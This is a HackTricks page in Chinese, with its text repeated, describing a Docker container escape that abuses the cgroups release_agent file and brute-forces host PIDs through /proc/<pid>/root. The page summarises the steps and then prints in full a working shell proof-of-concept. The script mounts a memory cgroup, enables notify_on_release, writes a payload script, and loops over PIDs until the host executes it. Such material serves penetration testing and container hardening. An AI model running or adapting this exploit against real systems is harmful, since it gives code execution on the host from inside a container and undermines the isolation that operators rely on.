release_agent exploit - Relative Paths to PIDs

上一页Docker Breakout / Privilege Escalation 下一页Docker release_agent cgroups escape

最后更新于1年前

release_agent exploit - Relative Paths to PIDs

从零开始学习AWS黑客技术，成为专家 ！

支持HackTricks的其他方式：

如果您想在HackTricks中看到您的公司广告或下载PDF版HackTricks，请查看!
获取
探索，我们的独家
加入 💬 或或关注我的Twitter 🐦 。
通过向和 github仓库提交PR来分享您的黑客技巧。

要了解更多详细信息，请查看来自的博客文章。这只是一个摘要：

该技术概述了一种从容器内部执行主机代码的方法，克服了存储驱动程序配置带来的挑战，这些配置会隐藏容器在主机上的文件系统路径，例如Kata Containers或特定的devicemapper设置。

关键步骤：

定位进程ID（PIDs）： 使用Linux伪文件系统中的/proc/<pid>/root符号链接，可以相对于主机的文件系统访问容器中的任何文件。这样可以绕过在主机上了解容器文件系统路径的需求。
PID猜测： 采用暴力搜索方法在主机上搜索PID。这是通过顺序检查/proc/<pid>/root/<file>中特定文件的存在来完成的。当找到文件时，表示相应的PID属于运行在目标容器内部的进程。
触发执行： 猜测的PID路径被写入cgroups release_agent文件。此操作触发release_agent的执行。通过检查是否创建了输出文件来确认此步骤的成功。

利用过程

利用过程涉及一系列更详细的操作，旨在通过猜测运行在容器内部的进程的正确PID，在主机上执行有效载荷。以下是操作步骤：

初始化环境： 在主机上准备一个有效载荷脚本（payload.sh），并为cgroup操作创建一个唯一目录。
准备有效载荷： 编写包含要在主机上执行的命令的有效载荷脚本，并使其可执行。
设置Cgroup： 挂载和配置cgroup。设置notify_on_release标志以确保在释放cgroup时执行有效载荷。
暴力破解PID： 循环遍历潜在的PID，将每个猜测的PID写入release_agent文件。这实际上将有效载荷脚本设置为release_agent。
触发和检查执行： 对于每个PID，将cgroup的cgroup.procs写入，如果PID正确，则触发release_agent的执行。循环将继续，直到找到有效载荷脚本的输出，表示成功执行。

博客文章中的PoC：

#!/bin/sh

OUTPUT_DIR="/"
MAX_PID=65535
CGROUP_NAME="xyx"
CGROUP_MOUNT="/tmp/cgrp"
PAYLOAD_NAME="${CGROUP_NAME}_payload.sh"
PAYLOAD_PATH="${OUTPUT_DIR}/${PAYLOAD_NAME}"
OUTPUT_NAME="${CGROUP_NAME}_payload.out"
OUTPUT_PATH="${OUTPUT_DIR}/${OUTPUT_NAME}"

# Run a process for which we can search for (not needed in reality, but nice to have)
sleep 10000 &

# Prepare the payload script to execute on the host
cat > ${PAYLOAD_PATH} << __EOF__
#!/bin/sh

OUTPATH=\$(dirname \$0)/${OUTPUT_NAME}

# Commands to run on the host<
ps -eaf > \${OUTPATH} 2>&1
__EOF__

# Make the payload script executable
chmod a+x ${PAYLOAD_PATH}

# Set up the cgroup mount using the memory resource cgroup controller
mkdir ${CGROUP_MOUNT}
mount -t cgroup -o memory cgroup ${CGROUP_MOUNT}
mkdir ${CGROUP_MOUNT}/${CGROUP_NAME}
echo 1 > ${CGROUP_MOUNT}/${CGROUP_NAME}/notify_on_release

# Brute force the host pid until the output path is created, or we run out of guesses
TPID=1
while [ ! -f ${OUTPUT_PATH} ]
do
if [ $((${TPID} % 100)) -eq 0 ]
then
echo "Checking pid ${TPID}"
if [ ${TPID} -gt ${MAX_PID} ]
then
echo "Exiting at ${MAX_PID} :-("
exit 1
fi
fi
# Set the release_agent path to the guessed pid
echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent
# Trigger execution of the release_agent
sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs"
TPID=$((${TPID} + 1))
done

# Wait for and cat the output
sleep 1
echo "Done! Output:"
cat ${OUTPUT_PATH}

上一页Docker Breakout / Privilege Escalation 下一页Docker release_agent cgroups escape

最后更新于1年前

从零开始学习AWS黑客技术，成为专家 ！

支持HackTricks的其他方式：

如果您想在HackTricks中看到您的公司广告或下载PDF版HackTricks，请查看!
获取
探索，我们的独家
加入 💬 或或关注我的Twitter 🐦 。
通过向和 github仓库提交PR来分享您的黑客技巧。

要了解更多详细信息，请查看来自的博客文章。这只是一个摘要：

关键步骤：

定位进程ID（PIDs）： 使用Linux伪文件系统中的/proc/<pid>/root符号链接，可以相对于主机的文件系统访问容器中的任何文件。这样可以绕过在主机上了解容器文件系统路径的需求。
PID猜测： 采用暴力搜索方法在主机上搜索PID。这是通过顺序检查/proc/<pid>/root/<file>中特定文件的存在来完成的。当找到文件时，表示相应的PID属于运行在目标容器内部的进程。
触发执行： 猜测的PID路径被写入cgroups release_agent文件。此操作触发release_agent的执行。通过检查是否创建了输出文件来确认此步骤的成功。

利用过程

利用过程涉及一系列更详细的操作，旨在通过猜测运行在容器内部的进程的正确PID，在主机上执行有效载荷。以下是操作步骤：

初始化环境： 在主机上准备一个有效载荷脚本（payload.sh），并为cgroup操作创建一个唯一目录。
准备有效载荷： 编写包含要在主机上执行的命令的有效载荷脚本，并使其可执行。
设置Cgroup： 挂载和配置cgroup。设置notify_on_release标志以确保在释放cgroup时执行有效载荷。
暴力破解PID： 循环遍历潜在的PID，将每个猜测的PID写入release_agent文件。这实际上将有效载荷脚本设置为release_agent。
触发和检查执行： 对于每个PID，将cgroup的cgroup.procs写入，如果PID正确，则触发release_agent的执行。循环将继续，直到找到有效载荷脚本的输出，表示成功执行。

博客文章中的PoC：

#!/bin/sh

OUTPUT_DIR="/"
MAX_PID=65535
CGROUP_NAME="xyx"
CGROUP_MOUNT="/tmp/cgrp"
PAYLOAD_NAME="${CGROUP_NAME}_payload.sh"
PAYLOAD_PATH="${OUTPUT_DIR}/${PAYLOAD_NAME}"
OUTPUT_NAME="${CGROUP_NAME}_payload.out"
OUTPUT_PATH="${OUTPUT_DIR}/${OUTPUT_NAME}"

# Run a process for which we can search for (not needed in reality, but nice to have)
sleep 10000 &

# Prepare the payload script to execute on the host
cat > ${PAYLOAD_PATH} << __EOF__
#!/bin/sh

OUTPATH=\$(dirname \$0)/${OUTPUT_NAME}

# Commands to run on the host<
ps -eaf > \${OUTPATH} 2>&1
__EOF__

# Make the payload script executable
chmod a+x ${PAYLOAD_PATH}

# Set up the cgroup mount using the memory resource cgroup controller
mkdir ${CGROUP_MOUNT}
mount -t cgroup -o memory cgroup ${CGROUP_MOUNT}
mkdir ${CGROUP_MOUNT}/${CGROUP_NAME}
echo 1 > ${CGROUP_MOUNT}/${CGROUP_NAME}/notify_on_release

# Brute force the host pid until the output path is created, or we run out of guesses
TPID=1
while [ ! -f ${OUTPUT_PATH} ]
do
if [ $((${TPID} % 100)) -eq 0 ]
then
echo "Checking pid ${TPID}"
if [ ${TPID} -gt ${MAX_PID} ]
then
echo "Exiting at ${MAX_PID} :-("
exit 1
fi
fi
# Set the release_agent path to the guessed pid
echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent
# Trigger execution of the release_agent
sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs"
TPID=$((${TPID} + 1))
done

# Wait for and cat the output
sleep 1
echo "Done! Output:"
cat ${OUTPUT_PATH}

从零开始学习AWS黑客技术，成为专家 ！

其他支持HackTricks的方式：